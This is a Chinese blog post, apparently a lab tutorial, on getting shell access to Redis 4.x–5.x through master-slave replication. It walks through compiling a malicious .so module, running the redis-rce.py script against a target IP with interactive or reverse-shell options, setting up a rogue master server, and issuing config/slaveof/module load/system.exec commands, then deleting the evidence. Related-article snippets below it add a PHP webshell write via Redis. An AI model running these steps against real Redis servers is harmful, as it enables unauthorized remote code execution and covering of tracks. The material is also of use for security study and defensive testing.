redis远程备份脚本_Redis主从复制Getshell学习

最新推荐文章于 2024-07-23 18:42:27 发布
最新推荐文章于 2024-07-23 18:42:27 发布
阅读量662 收藏
点赞数
文章标签: redis远程备份脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34529812/article/details/113489980
版权

主从复制

    Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。

部署redis

注意:主从复制的利用方式不需要root权限,在6.0.5版本及以后版本中已经修复了该问题。,所以这里要下载6.0.5以下的版本,同时需要高于4.x的版本才行(因为4.X才有的加载模块的功能)。

下载:http://download.redis.io/releases/redis-5.0.9.tar.gz

编译安装:

tar -zxf redis-5.0.9.tar.gz

cd redis-5.0.9

make

cd src

make install

启动:

redis-server

69d0a0fb18d7404ffa13fce01203e46d.png

高版本的redis默认安装后是不允许远程连接的,且需要密码认证,所以需要修改一下配置文件:

vim redis-5.0.9/redis.conf

注释掉下面这行,或者改成bind 0.0.0.0

05efe3550189f6a1a0dde1089cf49cda.png

将yes改为no,取消密码认证

f4ce5116856b482bf8f65e4481d93c07.png

重新运行redis-server  redis-5.0.9/redis.conf (因为是源码安装,这里需要指定配置文件进行启动)

Getshell原理

在redis 4.x之后的版本中,允许以模块化的形式从外部加载.so文件,而这个文件中代码将会变成redis功能的一部分,从而实现功能扩展。我们利用这个功能通过编译恶意的.so文件,并将该文件同步到从属redis上,进行加载,即可实现恶意代码的功能。

过程

.so源码下载地址:https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

编译

cd  RedisModules-ExecuteCommand

make

然后生成一个so文件RedisModules-ExecuteCommand/src/module.so

19a05bff6b06b7abd6393f2583638f7a.png

1.下载自动化攻击脚本:

git clone https://github.com/Ridter/redis-rce.git

命令:

pip install -r requirement.txt

python3 redis-rce.py -r 192.168.194.129 -p6379 -L 192.168.194.1 -fmodule.so

4d36e3a005ce1549dab7b44e1283816e.png

选择一个shell方式:

选择交互式shell:

9cc002897ec9a1f259967ac423df06b1.png

使用反弹shell:

7dc06240882c117f0c8b265ed4ac4951.png

2.如果是用手动的方式:

下载工具:https://codeload.github.com/LoRexxar/redis-rogue-server/zip/master

启动一个模拟的redis服务

python RogueServer.py --lport 1234 --exp exp.so

然后利用未授权访问漏洞连接对方redis服务:

57e7f925ea320f0eef8ac13e11d43a99.png

#设置redis的备份路径为当前目录

config set dir ./

#设置备份文件名为module.so,默认为dump.rdb

    config set dbfilename module.so

#设置主服务器IP和端口

    slaveof 192.168.194.11234 #就是这一步,决定了后面会从这里加载恶意so文件。

#加载恶意模块

    module load ./module.so 

这个加载module本身其实在配置文件里也可以写上加载的模块路径,但因为是攻击,所以一般不具备修改配置文件的条件:

redis.conf

d298524b3e6ef60a0ed78139aa3a7316.png

#切断主从,关闭复制功能

    slaveof no one

#执行系统命令

    system.exec 'whoami'

94cb207361240d8f84a0d88cd8fb9b82.png

#通过dump.rdb文件恢复数据

    config set dbfilename dump.rdb

#删除exp.so

    system.exec 'rm ./exp.so'

#卸载system模块的加载

    module unload system

参考:

https://paper.seebug.org/975/

https://www.cnblogs.com/xiaozi/p/13089906.html

------------------------------------------------------------------------------

欢迎分享转发。

喜欢的话动动手指点个“关注”和“在看”吧~da87b46a409ab952499563c8708c99f5.png

5e99f9c6cd2c2e64f6e8a2c8ff0ee6a6.png

(信安随笔)

------------------------------------------------------------------------------

免责声明

本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。

S designer
关注
Redis哨兵模式 (sentinel) (主从复制,读写分离)
黑马程序员广州中心的专栏
12-12 2506
Redis的集群方案大致有三种: 1)redis cluster集群方案;2)master/slave主从方案;3)哨兵模式来进行主从替换以及故障恢复。 一、sentinel哨兵模式介绍 Sentinel(哨兵)是用于监控redis集群中Master状态的工具,是Redis 的高可用性解决方案,sentinel哨兵模式已经被集成在redis2.4之后的版本中...
Linux企业运维——Redis的安装部署及主从复制、master自动切换,redis、mysql读写分离
qq_60200126的博客
09-20 649
redis lftp 172.25.254.250 cd /pub/docs/redis get redis-6.2.4.tar.gz 解压 cd redis-6.2.4 cd utils vim install_server.sh make make install ./install_server.sh scp redis-6.2.4 server2: tar zxf redis-6.2.4.tar.gz cd redis-6.2.4/ make 报错 yum install -y gcc cd …
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
Redis主从复制
weixin_45794666的博客
02-24 1755
Redis主从复制 未授权访问 版本3.2之前都是绑定0.0.0.0:6379所以暴露在公网 3.2之后绑定127.0.0.1相对安全,但是还是无密码可以利用ssrf进行利用(gopher,dict) 利用 注意flushall危险操作,会清空所有缓存数据。 通用 写入webshell flushall set x '<?php eval($_GET["Q"]);?>' config set dir /var/www/html/upload config set dbfilename tes
服务器定时备份mysql、redis数据
最新发布
wuyifan0的博客
07-23 151
数据库备份,mysql、redis,定时备份
Redis主从复制getshell技巧
热门推荐
06-10 2万+
Redis未授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell 、写入启动项。 Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。 基于Redis主从复制的机制,可以通过FULLRESYNC将任意文件同步到从节点(slave),这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着...
redis远程备份脚本_分布式实战:Redis企业级灾备方案
weixin_29482557的博客
01-31 323
本文首发于Ressmix个人站点:https://www.tpvlog.com上一章,我讲解了Redis的两种持久化方式的基本配置,那么在生产环境中,Redis的持久化到底该如何运用呢?企业级的数据备份和各种灾难下的数据恢复,又是怎么做的呢?本章,我就通过实战演练,讲一讲企业级Redis灾备方案。一、持久化配置策略Redis的持久化配置,就两种——RDB和AOF,在生产环境配置下,主要就...
完全复制一个dict_Redis主从复制getshell技巧
weixin_33209042的博客
01-02 212
Redis未授权漏洞常见的漏洞利用方式:Windows下,绝对路径写webshell 、写入启动项。Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。基于Redis主从复制的机制,可以完美无损的将文件同步到从节点。这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着更多的可能性等待被探索。一、Redis 主从复制一...
自动化部署Redis Shell脚本
01-04
主从复制可以实现数据备份,哨兵系统能够监控和自动故障恢复,而Redis Cluster则提供了一种分布式的解决方案,以支持更大规模的数据存储和高可用性。 总的来说,通过编写Shell脚本自动化部署Redis,不仅可以提高...
一个集成redis-benchmark的redis压测的脚本
qq_39570637的博客
06-09 487
一个redis压测的脚本 支持 单节点 主从 sentinel cluster (sentinel的还没写) 需要调用redis-benchmark 用来测试不同版本redis7 同样写入速率和相同数据量下 redis占用内存大小 写了很多def,改天统一合并到一个类里面去......
redis常用命令详解
HB199753的博客
11-10 321
一、Redis的数据结构 Redis底层是由C语言编写的,redis里面内置的数据结构即是用C语言的结构体实现的。redis的数据结构有以下5种。 1、数据结构分类 string:字符串类型; hash:哈希类型,相当于map类型,值也是以键值对的形式存在的; list:列表类型,可以支持重复性的数据; set:集合类型,与list的区别是不支持重复性的数据; sortedset:有序集合类型,在不支持重复的同时还保证数据是有序的。 2、各种数据结构常用的命令操作 2.1 set ...
七、利用redis主从复制getshell
dahege666的博客
03-02 1373
一、测试环境 redis主机:kali 192.168.1.138 redis从机:centos7 192.168.1.27 二、测试过程 1.分别安装并开启redis数据库,注意4.X以上需要redis.conf关闭保护模式 2.在kali上连接靶机redis服务,并设置主从状态(将kali设置为redis主机) 3.在kali上编译恶意代码 git clone https...
redis远程备份到另一个redis_超详细的redis备份恢复命令总结
weixin_28465009的博客
01-24 1210
概述Redis是一个内存数据库,无论是RDB还是AOF,都只是其保证数据恢复的措施。所以Redis在利用RDB和AOF进行恢复的时候,都会读取RDB或AOF文件,重新加载到内存中。RDB就是Snapshot快照存储,是默认的持久化方式。今天主要介绍一下redis备份恢复方面的内容。01Redis 数据备份Redis SAVE 命令用于创建当前数据库的备份。1、语法redis Save 命令基本语...
redis一般用来干嘛_redis主从复制getshell
weixin_39552538的博客
12-08 272
先解释一下主从复制主从复制,是用来建立一个和主数据库完全一样的数据库环境,称为从数据库,主数据库一般是准实时的业务数据库。一台服务器充当主服务器,而另外一台服务器充当从服务器。此时主服务器会将更新信息写入到一个特定的二进制文件中,并会维护文件的一个索引用来跟踪日志循环,这个日志可以记录并发送到从服务器的更新中去。一台从服务器连接到主服务器时,从服务器会通知主服务器从服务器的日志文件中读...
redis的.aof文件定时备份shell脚本
weixin_47036600的博客
03-07 335
linux定时备份redis文件到另一台服务器
redis备份脚本(自用)
小不的博客
05-12 1492
自用
redis数据库备份脚本
weixin_34067049的博客
06-13 647
redis-dump命令安装环境参考一下链接地址:https://blog.51cto.com/wujianwei/2105124 redis数据库备份脚本: [root@localhost ~]# cat /data/scripts/dump_redisdata.sh #!/bin/bash source /etc/profile.d/rvm.sh /usr/local/rvm/bin/rvm ...
redis启动后 允许访问_Redis主从复制Getshell学习
weixin_33397740的博客
12-19 228
主从复制 Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。部署redis注意:主从复制的利用方式不需要root权限,在6.0.5版本及以后版本中已经修复了该问题。,所以这里要下载6.0.5以下的版本,同...
3.redis实战:redis自动备份备份管理
linux_player_c(系统&开发)
07-11 7207
redis实战:redis自动备份备份管理
Redis主从复制漏洞:恶意.so文件与自动化getshell
攻击者可以使用Python脚本redis-rce.py,它接收目标IP、端口、本地IP和恶意.so文件路径作为参数,实现了自动化的getshell过程。首先,通过`make`命令编译恶意.so文件,然后利用`redis-rce.py`进行远程连接和加载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值